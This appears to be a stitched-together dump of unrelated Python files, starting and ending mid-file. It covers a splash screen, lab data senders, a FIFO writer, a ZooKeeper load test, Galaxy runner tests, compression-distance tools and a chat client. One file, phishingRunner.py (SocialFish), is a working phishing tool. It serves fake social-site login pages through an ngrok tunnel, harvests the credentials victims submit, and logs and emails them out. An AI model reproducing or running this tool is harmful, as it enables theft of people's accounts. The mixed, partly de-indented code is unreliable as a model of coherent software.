                            bd=0, highlightthickness=0, relief='ridge')
    canvas.pack()
    splash_img = os.path.join(os.path.dirname(os.path.abspath(__file__)), "icons", "splash.png")
    # Keeping `img` referenced prevents the PhotoImage from being GC'd.
    img = ImageTk.PhotoImage(Image.open(splash_img).resize((size, size)))
    canvas.create_image(0, 0, anchor=tkinter.NW, image=img)
    # Poll the environment flag instead of running mainloop(); update() keeps
    # the window responsive while waiting for the editor to finish loading.
    while True:
        if os.getenv("PYUNITY_EDITOR_LOADED") == "1":
            break
        root.update()
        time.sleep(0.2)
    root.destroy()
def start(func, args=None, kwargs=None):
    """Run *func* on the current thread while the splash screen shows on a
    daemon thread in the background.

    :param func: callable to execute (typically the editor's boot function).
    :param args: positional arguments for *func* (default: none).
    :param kwargs: keyword arguments for *func* (default: none).

    Fix: the original used mutable default arguments (args=[], kwargs={}),
    which are shared across calls; None sentinels are backward-compatible.
    """
    t = threading.Thread(target=splash)
    t.daemon = True
    t.start()
    func(*(args or ()), **(kwargs or {}))
|
Practisinglist.py | counter = 15
# Dummy trial/session state used to exercise the data_sender prototype below.
lickT= 900000
start = 67
startmoment = 89
lickLst = []
rewLst= []
rewT=689
# Lick record layout: [trial counter, time since session start, time since
# trial start, lick side code ('RL'/'LL'), outcome label].
lickLst.append([counter,lickT-start,lickT-startmoment,'' +str('RL'), ''+str ('Correct')])
#print lickLst
#lickLst.append([counter,lickT-start,lickT-startmoment,'' +str('LL'), ''+str ('Incorrect')])
# Reward record layout: [trial counter, times as above, reward side code].
rewLst.append([counter, rewT-start, rewT-startmoment,'' +str('RR')])
#New data_sender function:
def data_sender(lickLst, rewLst):
    """Serialize lick and reward event lists into a single payload string.

    Numeric fields (counter and the two timestamps) are rounded to 3 decimals;
    the trailing side/outcome codes are strings and pass through unchanged.
    Fields within a record are joined with ' ', records with '-', and the two
    sections with ','.

    :returns: "LickList:...,rewList:..." payload string.

    Fix: the original had unbalanced brackets (a SyntaxError) and applied
    np.round to the string fields; this mirrors the working variant defined
    later in the file.
    """
    lickStr = 'LickList:' + '-'.join(
        str(np.round(entry[0], decimals=3)) + ' ' + str(np.round(entry[1], decimals=3))
        + ' ' + str(np.round(entry[2], decimals=3)) + ' ' + entry[3] + ' ' + entry[4]
        for entry in lickLst)
    rewStr = 'rewList:' + '-'.join(
        str(np.round(entry[0], decimals=3)) + ' ' + str(np.round(entry[1], decimals=3))
        + ' ' + str(np.round(entry[2], decimals=3)) + ' ' + entry[3]
        for entry in rewLst)
    sendStr = ','.join([lickStr, rewStr])
    return sendStr
# Exercise the sender once and show the payload. Fixes: the return value was
# discarded while a nonexistent module-level `sendStr` was printed, and the
# py2 `print` statement is a SyntaxError under Python 3.
sendStr = data_sender(lickLst, rewLst)
print(sendStr)
## sendProc = billiard.Process(target=send_data,args=(sendStr,))
## sendProc.start()
## print 'seeeeeending', (time.time()-start-soundT)
## #send_data(sendStr)
## sendT = time.time()
## lickLst = []; rewLst = []; #No need to empty / update the location/orientation values
## #these will be updated at the start of each trial
## return lickLst,rewLst,sendT
##
##
##
## if (time.time()-sendT> 5): #Basically, if 5 seconds have elapsed since the last data_send, then call on that function
## #and update the contents of the strings
## lickLst,rewLst,orientation,location = data_sender(lickLst,rewLst,orientation,location,sendT)
##
# Data sending function
import socket  # fix: used below but never imported anywhere in this file

# Discover this Pi's LAN address: "connecting" a UDP socket to a public IP
# sends no traffic but makes the kernel choose the outbound interface, whose
# address getsockname() then reports.
pi_IP = [(s.connect(('8.8.8.8', 80)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]
# Convention: Pi hosts get addresses ending in 1xx; the ID is that minus 100.
# NOTE(review): pi_IP[-3:] assumes a 3-digit final octet -- confirm addressing.
pi_ID = str(int(pi_IP[-3:])-100)
def send_data(load):
    """POST *load* to the central data server on behalf of this Pi.

    Performs a GET first to obtain a CSRF token cookie, then POSTs the payload
    to the write endpoint.
    NOTE(review): relies on `req` (presumably `import requests as req`), which
    is never imported in this file -- confirm the deployed script imports it.
    """
    headers = {'User-Agent': 'Mozilla/5.0'}
    link = 'http://192.168.0.99:8000/getData/' + pi_ID + '/get_PiData/'
    session = req.Session()
    r1 = session.get(link,headers=headers)
    link1 = 'http://192.168.0.99:8000/getData/' + pi_ID + '/write_PiData/'
    # Django requires the CSRF token from the GET response in the POST body.
    payload = {'piData':load,'csrfmiddlewaretoken':r1.cookies['csrftoken']}
    #cookies = dict(session.cookies)
    session.post(link1,headers=headers,data=payload)
    return None
def data_sender(lickLst, rewLst, orientation, location, sendT):
    """Format lick/reward/orientation/location data and POST it asynchronously.

    Spawns a billiard.Process running send_data() so the caller is not blocked
    by the HTTP round-trip, then returns emptied lick/reward lists plus the
    new send timestamp (location/orientation are refreshed each trial by the
    caller and are not cleared here).

    Fix: the original used the Python 2 ``print`` statement, a SyntaxError
    under Python 3.
    NOTE(review): `start` and `soundT` are free variables expected at module
    scope -- confirm they are defined in the deployed script.
    """
    lickStr = 'LickList:' + '-'.join([str(np.round(entry[0],decimals=3))+ ' ' + str(np.round(entry[1],decimals=3))+ ' ' + str(np.round(entry[2],decimals=3))+ ' ' + entry[3] + ' ' + entry[4] for entry in lickLst])
    rewStr = 'rewList:' + '-'.join([str(np.round(entry[0],decimals=3))+ ' ' + str(np.round(entry[1],decimals=3))+ ' ' + str(np.round(entry[2],decimals=3))+ ' ' + entry[3] for entry in rewLst])
    locStr = 'Location:' + '-'.join([str(np.round(location,decimals=3))])
    orStr = 'Orientation:' + '-'.join([str(np.round(orientation,decimals=3))])
    sendStr = ', '.join([rewStr,lickStr,locStr,orStr])
    sendProc = billiard.Process(target=send_data,args=(sendStr,))
    sendProc.start()
    print('seeeeeending', (time.time()-start-soundT))
    #send_data(sendStr)
    sendT = time.time()
    # No need to empty / update the location/orientation values --
    # these will be updated at the start of each trial.
    lickLst = []
    rewLst = []
    return lickLst,rewLst,sendT
|
PipeW.py | import os
import time
import io
import threading
import queue
from threading import Thread, Lock
class PipeW:
    """Writer end of a named pipe (FIFO) with a bounded, drop-oldest message queue.

    A background thread owns the pipe: it (re)opens the FIFO, drains messages
    from ``msgQ`` and writes them through, reconnecting whenever the reader
    disappears. ``Send`` never blocks the caller; when the queue holds
    ``msgQMax`` entries the oldest message is discarded to make room.
    """

    def __init__(self, fifoPath, msgQMax):
        self.path = fifoPath          # filesystem path of the FIFO
        self.pipe = None              # file object for the open write end, or None
        self.blocking = False         # True while os.open() is waiting for a reader
        self.msgQ = queue.Queue()
        self.msgQMax = msgQMax        # soft size cap enforced by Send()
        self.pipeThread = Thread(target = self.PipeThreadHandler)

    def OpenPipe(self):
        """Create the FIFO if needed and block until a reader connects.

        :returns: text-mode file object wrapping the write end, or None on error.
        """
        try:
            os.mkfifo(self.path)
            # Fix: the original used PHP-style '.' concatenation here, which
            # raised AttributeError at runtime.
            print("Created pipe on filesystem: " + self.path)
        except Exception as e:
            print("MKFIFO: " + repr(e))
        try:
            print("Waiting for listener.")
            self.blocking = True
            fd = os.open(self.path, os.O_WRONLY)  # blocks until a reader opens
            self.blocking = False
            print("OPENED File")
            out = os.fdopen(fd, 'w')
            print("OPENED File descriptor")
            print(io.DEFAULT_BUFFER_SIZE)
        except Exception as e:
            out = None
            print("OPEN: " + repr(e))  # fix: same '.' concatenation bug as above
        return out

    def ClosePipe(self):
        """Flush and close the write end, then remove the FIFO from the filesystem."""
        try:
            if self.blocking == False:
                # Guard added: OpenPipe() may have returned None on failure.
                if self.pipe is not None:
                    self.pipe.flush()
                    self.pipe.close()
            else:
                # os.open() is still blocked waiting for a reader; just tell
                # the worker loop to stop.
                self.pipeThreadRunning = False
        except BrokenPipeError:
            print("Pipe was already closed.")
        self.pipe = None
        try:
            os.unlink(self.path)
        except FileNotFoundError:
            pass

    def PipeThreadHandler(self):
        """Worker loop: open the pipe, forward queued messages, reconnect on EPIPE."""
        self.pipeThreadRunning = True
        self.pipe = self.OpenPipe()
        while self.pipeThreadRunning:
            try:
                # Timeout so pipeThreadRunning is re-checked every 2 seconds.
                msg = self.msgQ.get(block = True, timeout = 2)
                self.msgQ.task_done()
                self.pipe.write(msg)
                self.pipe.flush()
            except queue.Empty:
                pass
            except BrokenPipeError:
                print("Disconnected!")
                self.ClosePipe()
                self.pipe = self.OpenPipe()
        self.ClosePipe()

    def Send(self, message):
        """Queue *message* for writing; drop the oldest entry if the queue is full."""
        if self.msgQ.qsize() < self.msgQMax:
            self.msgQ.put(message)
        else:
            self.msgQ.get(block = False)
            self.msgQ.task_done()
            self.msgQ.put(message)

    def Start(self):
        """Start the background writer thread (no-op if already running)."""
        if self.pipeThread.is_alive() == False:
            print("Starting pipe thread.")
            self.pipeThread.start()

    def Stop(self):
        """Stop the worker; if it is blocked in os.open(), unblock it by briefly
        opening the read end of the FIFO ourselves."""
        if self.pipeThread.is_alive() == True:
            self.pipeThreadRunning = False
            if self.blocking == True:
                fifo = os.open(self.path, os.O_RDONLY)
                os.close(fifo)
            else:
                self.ClosePipe()
kazoo_more_room_test.py | import datetime
import random
import threading
import time
from kazoo.client import KazooClient
from zk.zk_wrapper import zkWatch
"""
自己笔记本
700 房间 400人 500count/s
50 房间 400人 220count/s
ecs 8核16G
cpu 60% 1200count /1s 5个进程 每个进程400-600 线程
cpu 15% 500count /1s 1个进程 每个进程400-600 线程
"""
# Connect to the local ZooKeeper ensemble; ROOT is the prefix under which the
# per-room znodes live.
zk = KazooClient(hosts='127.0.0.1:2181')
ROOT = "/1"
zk.start()
index = 0
# 50 candidate rooms with ids "100".."149" (znode names must be strings).
room_list = list(range(100, 150))
room_list = [str(x) for x in room_list]
def random_room():
    """Return one room id chosen uniformly at random from room_list."""
    # (Return a fixed id such as "11111" here to stress a single room instead.)
    return random.choice(room_list)
# Timestamp of the previous 200-callback batch; used to report batch latency.
old_date = datetime.datetime.now()
def test_call(_data):
    """Watch callback: counts invocations, reports throughput every 200 calls,
    and fans out 200 additional watcher threads to amplify load."""
    # NOTE(review): threading.RLock has no zk_acquire()/zk_release(); unless
    # the zk wrapper patches these onto the lock, the first callback raises
    # AttributeError -- confirm against zk.zk_wrapper.
    rlock.zk_acquire()
    global count
    global old_date
    count = count + 1
    if count % 200 == 0:
        print(count)
        now_date = datetime.datetime.now()
        # Seconds elapsed for the last 200 callbacks.
        print((datetime.datetime.now() - old_date).total_seconds())
        old_date = now_date
        # NOTE(review): indentation was lost in this dump; the thread fan-out
        # presumably belongs inside the every-200th branch (spawning 200
        # threads on *every* callback would explode immediately) -- confirm.
        for i in range(200):
            t = threading.Thread(target=run, args=())
            t.start()
    rlock.zk_release()
def run():
    """Register one watch on a randomly-chosen room znode; test_call fires on
    changes to that node."""
    # for x in range(1):
    zkWatch(zk, "/".join([ROOT, random_room()]), test_call, "")
# Global callback counter and lock shared by all watcher threads.
count = 0
rlock = threading.RLock()
# Seed the system with 600 watcher threads; afterwards callbacks themselves
# keep spawning more watchers while the main thread just idles.
for i in range(600):
    t = threading.Thread(target=run, args=())
    t.start()
while True:
    time.sleep(1)
|
phishingRunner.py | ######################################################
# #
# SOCIALFISH v2.0 #
# #
# by: UNDEADSEC #
# #
# Telegram Group: https://t.me/UndeadSec #
# YouTube Channel: https://youtube.com/c/UndeadSec #
# Twitter: https://twitter.com/A1S0N_ #
# #
######################################################
from contextlib import contextmanager
import json
import multiprocessing
import requests
import os
from time import sleep
from huepy import *
import subprocess
from core.email import send_mail
from core.credentials import credentials
from smtplib import SMTPSenderRefused, SMTPServerDisconnected
from time import strftime
def runPhishing(social, custom):
    """Stage the phishing page for *social* into the PHP web root.

    Clears base/Server/www, copies the chosen template over, and substitutes
    the <CUST0M> placeholder in login.php with *custom*. Remembers the choice
    in the module-global _social for the logging/mail helpers.

    NOTE: *social* is interpolated into a shell command; it comes from the
    tool's fixed menu, but never pass untrusted input here.

    Fix: the original re-bound the read handle to a second open() without
    closing it; both files are now handled with context managers.
    """
    global _social
    _social = social
    os.system('rm -Rf base/Server/www/*.* && touch base/Server/www/cat.txt')
    command = 'cp base/WebPages/%s/*.* base/Server/www/' % social.lower()
    os.system(command)
    with open('base/Server/www/login.php') as f:
        read_data = f.read()
    with open('base/Server/www/login.php', 'w') as f:
        f.write(read_data.replace('<CUST0M>', custom))
def waitCreds():
    """Busy-poll cat.txt for captured credentials; log and mail each batch.

    Runs forever: the phishing page's login.php appends submitted credentials
    to base/Server/www/cat.txt, which is truncated after every pickup so the
    same batch is never processed twice.
    """
    print(cyan(" [*] Waiting for credentials... "))
    while True:
        with open('base/Server/www/cat.txt') as creds:
            lines = creds.read().rstrip()
            if len(lines) != 0:
                print(green('\n [*] Credentials found:\n %s' % lines))
                # Truncate the capture file so these creds are not re-sent.
                os.system('rm -rf base/Server/www/cat.txt && touch base/Server/www/cat.txt')
                try:
                    credentials(lines.split('\n'), _social)
                    send_mail(lines.split('\n'),_social)
                except NameError:
                    # _social not set yet (runPhishing never called) -- skip.
                    pass
                except SMTPSenderRefused:
                    print(red(' [!] Sorry, sender refused :('))
                    pass
                except SMTPServerDisconnected:
                    pass
@contextmanager
def runServer(port: int):
    """Context manager serving base/Server/www with PHP's built-in web server
    on 127.0.0.1:*port* in a child process; tears the server down on exit.

    Fixes vs original: the child was never terminated if the with-body raised
    (no try/finally around yield), the helper function's name was shadowed by
    the Process object, and close() was called on a process that might not
    have exited yet (multiprocessing requires the process to be stopped).
    """
    def _serve():
        os.system("cd base/Server/www/ && php -n -S 127.0.0.1:%d > /dev/null 2>&1 &" % port)

    proc = multiprocessing.Process(target=_serve)
    proc.start()
    try:
        yield proc
    finally:
        proc.terminate()
        proc.join()   # close() is only valid once the process has stopped
        proc.close()
@contextmanager
def ngrok_start(port: int):
    """Launch an ngrok HTTP tunnel for *port* and yield its public URL.

    Polls ngrok's local web API until the tunnel is registered, yields the
    public URL to the with-body, then kills the ngrok process (SIGTERM).
    """
    ngrok_process = subprocess.Popen(
        ['./base/Server/ngrok','http','%s' % port],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE
    )
    while True:
        try:
            # ngrok exposes tunnel metadata on a local API once it is up.
            ngrok_url = requests.get('http://127.0.0.1:4040/api/tunnels/command_line')
            if ngrok_url.status_code == 200:
                public_url = json.loads(ngrok_url.text)['public_url']
                print(lightgreen('\n [*] Ngrok URL: %s' % public_url))
                print(green(' [*] Your logs are being stored in: Logs/{}').format(_social + strftime('-%y%m%d.txt')))
                print(yellow(' [^] Press Ctrl+C or VolDown+C(android) to quit'))
                yield public_url
                break
            # NOTE(review): a non-200 response loops with no sleep (busy spin);
            # only ConnectionError is throttled -- confirm intended.
        except requests.exceptions.ConnectionError:
            sleep(.5)
    # Reached after the with-body completes: terminate ngrok.
    os.kill(ngrok_process.pid, 15)
def PhishingServer(port: int=1449):
    """Bring up the ngrok tunnel and the local PHP server, then block
    harvesting credentials until interrupted."""
    with ngrok_start(port), runServer(port):
        waitCreds()
|
test_runner_local.py | import os
import threading
import time
from unittest import TestCase
from galaxy import model
from galaxy.jobs import metrics
from galaxy.jobs.runners import local
from galaxy.util import bunch
from ..tools_support import (
UsesApp,
UsesTools
)
class TestLocalJobRunner(TestCase, UsesApp, UsesTools):
def setUp(self):
    """Build a minimal app + tool and wrap a mock job for the local runner."""
    self.setup_app()
    self._init_tool()
    self.app.job_metrics = metrics.JobMetrics()
    self.job_wrapper = MockJobWrapper(self.app, self.test_directory, self.tool)
def tearDown(self):
self.tear_down_app()
def test_run(self):
self.job_wrapper.command_line = "echo HelloWorld"
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert self.job_wrapper.stdout.strip() == "HelloWorld"
def test_galaxy_lib_on_path(self):
self.job_wrapper.command_line = '''python -c "import galaxy.util"'''
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert self.job_wrapper.exit_code == 0
def test_default_slots(self):
self.job_wrapper.command_line = '''echo $GALAXY_SLOTS'''
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert self.job_wrapper.stdout.strip() == "1"
def test_slots_override(self):
# Set local_slots in job destination to specify slots for
# local job runner.
self.job_wrapper.job_destination.params["local_slots"] = 3
self.job_wrapper.command_line = '''echo $GALAXY_SLOTS'''
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert self.job_wrapper.stdout.strip() == "3"
def test_exit_code(self):
self.job_wrapper.command_line = '''sh -c "exit 4"'''
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert self.job_wrapper.exit_code == 4
def test_metadata_gets_set(self):
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert os.path.exists(self.job_wrapper.mock_metadata_path)
def test_metadata_gets_set_if_embedded(self):
self.job_wrapper.job_destination.params["embed_metadata_in_job"] = "True"
# Kill off cruft for _handle_metadata_externally and make sure job stil works...
self.job_wrapper.external_output_metadata = None
self.app.datatypes_registry.set_external_metadata_tool = None
runner = local.LocalJobRunner(self.app, 1)
runner.queue_job(self.job_wrapper)
assert os.path.exists(self.job_wrapper.mock_metadata_path)
def test_stopping_job(self):
self.job_wrapper.command_line = '''python -c "import time; time.sleep(15)"'''
runner = local.LocalJobRunner(self.app, 1)
def queue():
runner.queue_job(self.job_wrapper)
t = threading.Thread(target=queue)
t.start()
while True:
if self.job_wrapper.external_id:
break
time.sleep(.01)
external_id = self.job_wrapper.external_id
mock_job = bunch.Bunch(
get_external_output_metadata=lambda: None,
get_job_runner_external_id=lambda: str(external_id),
get_id=lambda: 1
)
runner.stop_job(mock_job)
t.join(1)
class MockJobWrapper(object):
    """Stand-in for Galaxy's JobWrapper exposing only what LocalJobRunner touches."""

    def __init__(self, app, test_directory, tool):
        working_directory = os.path.join(test_directory, "workdir")
        tool_working_directory = os.path.join(working_directory, "working")
        os.makedirs(tool_working_directory)
        self.app = app
        self.tool = tool
        self.requires_containerization = False
        self.state = model.Job.states.QUEUED
        self.command_line = "echo HelloWorld"
        self.environment_variables = []
        self.commands_in_new_shell = False
        self.prepare_called = False
        self.write_version_cmd = None
        self.dependency_shell_commands = None
        self.working_directory = working_directory
        self.tool_working_directory = tool_working_directory
        self.requires_setting_metadata = True
        self.job_destination = bunch.Bunch(id="default", params={})
        self.galaxy_lib_dir = os.path.abspath("lib")
        self.job_id = 1
        self.external_id = None
        self.output_paths = ['/tmp/output1.dat']
        # The metadata "tool" just touches this path; tests assert it exists.
        self.mock_metadata_path = os.path.abspath(os.path.join(test_directory, "METADATA_SET"))
        self.metadata_command = "touch %s" % self.mock_metadata_path
        self.galaxy_virtual_env = None
        self.shell = "/bin/bash"
        # Cruft for setting metadata externally, axe at some point.
        self.external_output_metadata = bunch.Bunch(
            set_job_runner_external_pid=lambda pid, session: None
        )
        self.app.datatypes_registry.set_external_metadata_tool = bunch.Bunch(
            build_dependency_shell_commands=lambda: []
        )

    def prepare(self):
        self.prepare_called = True

    def set_job_destination(self, job_destination, external_id):
        # Runner reports the spawned process id here; tests poll external_id.
        self.external_id = external_id

    def get_command_line(self):
        return self.command_line

    def get_id_tag(self):
        return "1"

    def get_state(self):
        return self.state

    def change_state(self, state):
        self.state = state

    def get_output_fnames(self):
        return []

    def get_job(self):
        return model.Job()

    def setup_external_metadata(self, **kwds):
        return self.metadata_command

    def get_env_setup_clause(self):
        return ""

    def has_limits(self):
        return False

    def finish(self, stdout, stderr, exit_code):
        # Runner delivers results here; tests read them back off the wrapper.
        self.stdout = stdout
        self.stderr = stderr
        self.exit_code = exit_code
|
generateDistanceMatrix.py | import math
import subprocess
import threading
import cv2
import numpy as np
import time
import os
from nvjpeg import NvJpeg
from ctypes import *
P = 8
def thread_function(name, folder):
    """Worker thread: fill this thread's slice of the global NCD matrix.

    Thread `name` (0..P-1) handles a contiguous chunk of the file list,
    shelling out to the WSL `ncd` tool once per file.

    :param name: zero-based thread index selecting the chunk.
    :param folder: directory holding the files to compare.
    """
    global outputString, labels, files, P
    N = len(files)
    # Split the N files into P contiguous chunks; (float)(N) is just float(N).
    start = name * math.ceil((float)(N) / P)
    end = min(N, (name + 1) * math.ceil((float)(N) / P))
    start_time = time.time()
    for n in range(start, end, 1):
        # One ncd run compares file n against every file in the folder.
        command = "wsl ncd -d " + folder + " -f " + folder + "/" + files[n]
        process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
        output, error = process.communicate()
        output = output.decode('utf-8')
        labels[n] = files[n]
        # Output line: "<label> d1 d2 ... dN "; drop label and trailing empty token.
        outputStringHelp1 = output.split(' ')
        outputStringHelp2 = np.array(outputStringHelp1[1:len(outputStringHelp1) - 1])
        for i in range(N):
            outputString[i][n] = outputStringHelp2.astype(float)[i]
    print("--- %s seconds ---" % (time.time() - start_time) + " Thread " + str(name))
    return None
#plt.savefig('foo.png')
def NVCOMP(argv):
    """Compute an NCD-style distance matrix on the GPU via the nvcomp DLL.

    :param argv: C-style argument list; argv[0] is the data folder.
    :return: (N, N) numpy array of distances, or None on failure.
    """
    so_file = "dlls/FirstTryNvcomp.dll"
    LP_c_char = POINTER(c_char)
    LP_LP_c_char = POINTER(LP_c_char)
    my_functions = CDLL(so_file)
    my_functions.NCD_NVCOMP_2.argtypes = c_int, POINTER(POINTER(c_char))
    my_functions.NCD_NVCOMP_2.restype = POINTER(POINTER(c_float))
    # Marshal the python strings into a char** for the C entry point.
    p = (LP_c_char * len(argv))()
    for i, arg in enumerate(argv):
        enc_arg = arg.encode('utf-8')
        p[i] = create_string_buffer(enc_arg)
    na = cast(p, LP_LP_c_char)
    entries = os.listdir(argv[0])
    A = my_functions.NCD_NVCOMP_2(len(argv), na)
    # BUG FIX: ctypes pointers never compare equal to None with `==`, so the
    # original `A == None` guard could not fire.  A NULL pointer is falsy.
    if not A:
        print('Error!')
        return
    # Reassemble the returned row pointers into a dense (N, N) numpy matrix.
    arr = np.ctypeslib.as_array(A[0], (1, len(entries)))
    for row in range(len(entries) - 1):
        arr = np.append(arr, np.ctypeslib.as_array(A[row + 1], (1, len(entries))), axis=0)
    return arr
def FCD(argv):
    """Compute a distance matrix via the multithreaded FCD DLL.

    :param argv: C-style argument list; argv[0] is the data folder.
    :return: (N, N) numpy array, or None when the DLL returns NULL.
    """
    so_file = "dlls/FCD.dll"
    LP_c_char = POINTER(c_char)
    LP_LP_c_char = POINTER(LP_c_char)
    my_functions = CDLL(so_file)
    my_functions.computeFCDMultithread.argtypes = c_int, POINTER(POINTER(c_char))
    my_functions.computeFCDMultithread.restype = POINTER(POINTER(c_float))
    # Marshal the python strings into a char** for the C entry point.
    p = (LP_c_char * len(argv))()
    for i, arg in enumerate(argv):
        enc_arg = arg.encode('utf-8')
        p[i] = create_string_buffer(enc_arg)
    na = cast(p, LP_LP_c_char)
    entries = os.listdir(argv[0])
    A = my_functions.computeFCDMultithread(len(argv), na)
    # Added NULL guard (consistent with NVCOMP): dereferencing A[0] on a NULL
    # pointer would crash.  ctypes NULL pointers are falsy.
    if not A:
        print('Error!')
        return
    arr = np.ctypeslib.as_array(A[0], (1, len(entries)))
    for row in range(len(entries) - 1):
        arr = np.append(arr, np.ctypeslib.as_array(A[row + 1], (1, len(entries))), axis=0)
    return arr
def NCD(folder):
    """Compute the full NCD matrix for `folder` using P worker threads.

    :return: (matrix, labels) — the module-level globals filled by the workers.
    """
    global outputString, labels, files
    # The os.walk loop only captures `files`; after it, `files` holds the
    # listing of the last directory visited (assumes a flat folder).
    for root, dirs, files in os.walk(folder):
        outputString = np.zeros((len(files), len(files)), dtype=float)
        labels = np.zeros((len(files),), dtype='U50')
    threads = list()
    for index in range(P):
        x = threading.Thread(target=thread_function, args=(index, folder))
        threads.append(x)
        x.start()
    for index, thread in enumerate(threads):
        thread.join()
    return outputString, labels
def NCD_Seq(folder):
    """Sequential NCD matrix via a single `wsl ncd` invocation (zlib compressor).

    :return: (matrix, labels) parsed from the tool's stdout.
    """
    folderName1 = folder
    folderName2 = folder
    command = "wsl ncd -c zlib -d " + folderName1 + " -d " + folderName2
    process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
    output, error = process.communicate()
    output = output.decode('utf-8')
    # One line per file: "<label> d1 d2 ... dN "; the final split('\n') entry is empty.
    outputList = output.split('\n')
    labels = np.zeros((len(outputList) - 1,), dtype='U50')
    outputString = np.zeros((len(outputList) - 1, len(outputList) - 1), dtype=float)
    for i in range(len(outputList) - 1):
        outputStringHelp1 = outputList[i].split(' ')
        labels[i] = outputStringHelp1[0]
        # Drop the leading label and the trailing empty token.
        outputStringHelp2 = np.array(outputStringHelp1[1:len(outputStringHelp1) - 1])
        outputString[i] = outputStringHelp2.astype(float)
    return outputString, labels
def NVJPEG(folder):
    """NCD-like similarity matrix for images using nvjpeg-compressed sizes.

    C(x) is approximated by the JPEG size of image x and C(xy) by the JPEG
    size of the two images stacked vertically, giving
    NCD(x, y) = (C(xy) - min(C(x), C(y))) / max(C(x), C(y)).

    :param folder: flat directory of image files.
    :return: (N, N) numpy array with 0.0 on the diagonal.
    """
    nj = NvJpeg()
    images = []
    for root, dirs, files in os.walk(folder):
        for file in files:
            images.append(cv2.imread(folder + "/" + file))
    out_bytes = np.zeros((len(images), len(images)))
    similarityMatrix = np.zeros((len(images), len(images)))
    for i in range(len(images)):
        for j in range(len(images)):
            # Diagonal holds C(x); off-diagonal holds C(xy) of the vertical concat.
            if i == j:
                value = images[i]
            else:
                value = cv2.vconcat([images[i], images[j]])
            out_bytes[i][j] = len(nj.encode(value))
    for i in range(len(images)):
        for j in range(len(images)):
            if i == j:
                similarityMatrix[i][j] = 0.0
            else:
                # BUG FIX: min() must compare the two single-image sizes
                # C(x)=out_bytes[i][i] and C(y)=out_bytes[j][j]; the original
                # passed out_bytes[i][j] (the concatenated size) to min().
                similarityMatrix[i][j] = (out_bytes[i][j] - min(out_bytes[i][i], out_bytes[j][j])) / max(out_bytes[i][i], out_bytes[j][j])
    return similarityMatrix
def NCD_CLASS(folder, test):
    """NCD distances between every test file and every training file.

    :param folder: training data directory.
    :param test: test data directory.
    :return: (matrix of shape (len(test), len(train)), labels of test files).
    """
    folderName1 = test
    folderName2 = folder
    command = "wsl ncd -c zlib -d " + folderName2 + " -d " + folderName1
    process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
    output, error = process.communicate()
    output = output.decode('utf-8')
    outputList = output.split('\n')
    # The os.walk loops only capture the file counts of each directory.
    for root, dirs, files in os.walk(test):
        sizeTest = len(files)
    for root, dirs, files in os.walk(folder):
        sizeTrain = len(files)
    labels = np.zeros((sizeTest,), dtype='U50')
    outputString = np.zeros((sizeTest, sizeTrain), dtype=float)
    for i in range(sizeTest):
        # Line: "<label> d1 d2 ... dN "; drop label and trailing empty token.
        outputStringHelp1 = outputList[i].split(' ')
        labels[i] = outputStringHelp1[0]
        outputStringHelp2 = np.array(outputStringHelp1[1:len(outputStringHelp1) - 1])
        outputString[i] = outputStringHelp2.astype(float)
    return outputString, labels
|
run_server.py | from server.zmq_server import run_zmq_SUB_server, expire_box_set_members, media_sending_process
import multiprocessing
import zmq
import time
import configfile
import redis
if __name__ == '__main__':
    # Launch the three worker processes, then run a ZMQ forwarder (PUB/SUB
    # proxy) in the main process until interrupted.
    try:
        rdb = redis.StrictRedis(host=configfile.REDIS_HOST)
        server_process = multiprocessing.Process(target=run_zmq_SUB_server, args=(rdb,))
        expire_box_process = multiprocessing.Process(target=expire_box_set_members, args=(rdb,))
        media_process = multiprocessing.Process(target=media_sending_process, args=(rdb,))
        server_process.start()
        media_process.start()
        expire_box_process.start()
        context = zmq.Context()
        socket_sub = context.socket(zmq.SUB)
        socket_pub = context.socket(zmq.PUB)
        socket_sub.bind(configfile.ZMQ_XSUB_ADDRESS)
        # BUG FIX: pyzmq on Python 3 requires a bytes topic; passing the str
        # '' raises TypeError.  b'' subscribes to everything.
        socket_sub.setsockopt(zmq.SUBSCRIBE, b'')
        socket_pub.bind(configfile.ZMQ_XPUB_ADDRESS)
        time.sleep(configfile.ZMQ_SOCKET_BIND_TIME)
        zmq.proxy(socket_pub, socket_sub)
    except KeyboardInterrupt:
        expire_box_process.terminate()
        server_process.terminate()
        media_process.terminate()
        server_process.join()
        media_process.join()
        # Previously leaked: expire_box_process was terminated but never joined.
        expire_box_process.join()
Client.py | from socket import *
from threading import *
from tkinter import *
# Connect to the chat server before building the UI; the socket is shared by
# the send handler and the receiver thread below.
clientSocket = socket(AF_INET, SOCK_STREAM)
clientSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
hostIp = "127.0.0.1"
portNumber = 5050
clientSocket.connect((hostIp, portNumber))
# Main window: a message log (Text) above a single-line input (Entry).
window = Tk()
window.title("Connected To: " + hostIp + ":" + str(portNumber))
txtMessages = Text(window, width=50)
txtMessages.grid(row=0, column=0, padx=10, pady=10)
txtYourMessage = Entry(window, width=50)
txtYourMessage.insert(0, "Your message")
txtYourMessage.grid(row=1, column=0, padx=10, pady=10)
def sendMessage():
    """Send the Entry's current text to the server and echo it into the log."""
    clientMessage = txtYourMessage.get()
    txtMessages.insert(END, "\n" + "You: " + clientMessage)
    clientSocket.send(clientMessage.encode("utf-8"))
# "Send" button wired to sendMessage above.
btnSendMessage = Button(window, text="Send", width=20, command=sendMessage)
btnSendMessage.grid(row=2, column=0, padx=10, pady=10)
def recvMessage():
    """Background loop: append every incoming server message to the log widget."""
    while True:
        serverMessage = clientSocket.recv(1024).decode("utf-8")
        print(serverMessage)
        txtMessages.insert(END, "\n" + serverMessage)
# Daemon thread so the receiver dies together with the UI main loop.
recvThread = Thread(target=recvMessage)
recvThread.daemon = True
recvThread.start()
window.mainloop()
|
common.py | import sys
from io import StringIO
def network_collapse(cluster):
